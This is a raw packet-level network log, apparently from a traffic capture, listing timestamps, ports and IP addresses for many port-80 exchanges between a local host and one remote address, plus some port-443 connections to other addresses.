Nov 13, 2024 20:39:52.122757912 CET	49976	443	192.168.2.5	23.222.241.134
Nov 13, 2024 20:39:52.122770071 CET	443	49976	23.222.241.134	192.168.2.5
Nov 13, 2024 20:39:52.123183966 CET	49975	443	192.168.2.5	23.222.241.134
Nov 13, 2024 20:39:52.123194933 CET	443	49975	23.222.241.134	192.168.2.5
Nov 13, 2024 20:39:52.123384953 CET	49977	443	192.168.2.5	204.79.197.219
Nov 13, 2024 20:39:52.123394966 CET	443	49977	204.79.197.219	192.168.2.5
Nov 13, 2024 20:39:52.124689102 CET	49978	443	192.168.2.5	204.79.197.219
Nov 13, 2024 20:39:52.124717951 CET	443	49978	204.79.197.219	192.168.2.5
Nov 13, 2024 20:39:52.124799013 CET	49978	443	192.168.2.5	204.79.197.219
Nov 13, 2024 20:39:52.125020981 CET	49978	443	192.168.2.5	204.79.197.219
Nov 13, 2024 20:39:52.125031948 CET	443	49978	204.79.197.219	192.168.2.5
Nov 13, 2024 20:39:52.143326998 CET	443	49970	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:52.148715973 CET	443	49973	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:52.148948908 CET	49973	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:52.148967981 CET	443	49973	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:52.149986982 CET	443	49973	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:52.150034904 CET	49973	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:52.150377035 CET	49973	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:52.150435925 CET	443	49973	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:52.151518106 CET	49973	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:52.151525021 CET	443	49973	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:52.188298941 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.188313007 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.188324928 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.188360929 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.188364983 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.188373089 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.188385010 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.188394070 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.188406944 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.188419104 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.188422918 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.188430071 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.188436985 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.188445091 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.188456059 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.188466072 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.188492060 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.190167904 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.190180063 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.190191031 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.190223932 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.190234900 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.190242052 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.190247059 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.190267086 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.190267086 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.190282106 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.190284014 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.190294027 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.190308094 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.190315962 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.190347910 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.190702915 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.190736055 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.190745115 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.190747976 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.190781116 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.190807104 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.190819025 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.190829039 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.190840960 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.190846920 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.190854073 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.190861940 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.190890074 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.190960884 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.190973043 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.190987110 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.190993071 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.190998077 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.191011906 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.191016912 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.191025019 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.191035986 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.191046000 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.191047907 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.191061974 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.191078901 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.191080093 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.191091061 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.191103935 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.191111088 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.191119909 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.191123962 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.191133976 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.191145897 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.191148996 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.191158056 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.191169977 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.191174030 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.191184044 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.191190958 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.191200018 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.191216946 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.191217899 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.191232920 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.191241026 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.191248894 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.191261053 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.191267967 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.191270113 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.191282988 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.191293001 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.191294909 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.191308022 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.191337109 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.191387892 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.191399097 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.191410065 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.191420078 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.191423893 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.191437006 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.191443920 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.191448927 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.191462040 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.191469908 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.191473007 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.191484928 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.191509962 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.191710949 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.191728115 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.191740036 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.191746950 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.191757917 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.191761017 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.191771030 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.191781998 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.191787958 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.191795111 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.191802979 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.191807985 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.191827059 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.191829920 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.191847086 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.191870928 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.191999912 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.192013025 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.192024946 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.192037106 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.192040920 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.192049026 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.192053080 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.192059994 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.192071915 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.192073107 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.192089081 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.192096949 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.192106962 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.192114115 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.192120075 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.192131996 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.192143917 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.192167997 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.192436934 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.192446947 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.192456961 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.192470074 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.192476034 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.192481041 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.192493916 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.192502975 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.192507982 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.192519903 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.192528009 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.192532063 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.192544937 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.192552090 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.192563057 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.192568064 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.192574978 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.192588091 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.192595959 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.192608118 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.192646027 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.197665930 CET	49973	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:52.218174934 CET	443	49969	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:52.233669043 CET	443	49968	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:52.247340918 CET	443	49967	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:52.258951902 CET	49969	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:52.276799917 CET	49968	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:52.283832073 CET	443	49963	40.115.3.253	192.168.2.5
Nov 13, 2024 20:39:52.285154104 CET	49963	443	192.168.2.5	40.115.3.253
Nov 13, 2024 20:39:52.285209894 CET	443	49963	40.115.3.253	192.168.2.5
Nov 13, 2024 20:39:52.285283089 CET	49963	443	192.168.2.5	40.115.3.253
Nov 13, 2024 20:39:52.286576033 CET	443	49971	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:52.288193941 CET	443	49972	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:52.293927908 CET	49967	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:52.305506945 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.305579901 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.305677891 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.305689096 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.305699110 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.305711031 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.305722952 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.305737019 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.305816889 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.305816889 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.305816889 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.305816889 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.305844069 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.305855989 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.305866003 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.305923939 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.305923939 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.308188915 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.308199883 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.308209896 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.308219910 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.308259964 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.308259964 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.308336973 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.308348894 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.308357954 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.308368921 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.308378935 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.308414936 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.308414936 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.308521032 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.308531046 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.308540106 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.308552027 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.308562994 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.308573961 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.308573961 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.308614016 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.308614969 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.308666945 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.308677912 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.308687925 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.308698893 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.308729887 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.308729887 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.308765888 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.308846951 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.308856010 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.308865070 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.308876991 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.308885098 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.308895111 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.308895111 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.308907032 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.308916092 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.308917046 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.308928967 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.308938980 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.308940887 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.308954000 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.308964014 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.308984041 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.308989048 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.309000969 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.309005022 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.309043884 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.309164047 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.309309959 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.309319019 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.309329987 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.309339046 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.309348106 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.309349060 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.309350014 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.309360981 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.309370995 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.309413910 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.309413910 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.309457064 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.309468031 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.309478045 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.309508085 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.309542894 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.309627056 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.309638023 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.309648037 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.309658051 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.309668064 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.309679985 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.309679985 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.309712887 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.309762001 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.309775114 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.309803009 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.309835911 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.309943914 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.309954882 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.309964895 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.309977055 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.309993982 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.310029030 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.310029030 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.310275078 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.310286045 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.310297012 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.310307026 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.310328007 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.310328007 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.310362101 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.310420990 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.310432911 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.310442924 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.310452938 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.310475111 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.310508013 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.310565948 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.310575962 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.310586929 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.310597897 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.310607910 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.310616970 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.310622931 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.310630083 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.310642004 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.310652018 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.310652018 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.310672998 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.310695887 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.310702085 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.310714006 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.310723066 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.310745955 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.310746908 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.310781956 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.311383963 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.311394930 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.311403990 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.311414003 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.311425924 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.311429977 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.311465979 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.311465979 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.311559916 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.311569929 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.311579943 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.311613083 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.311613083 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.311682940 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.311693907 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.311703920 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.311732054 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.311764956 CET	49873	80	192.168.2.5	185.215.113.206
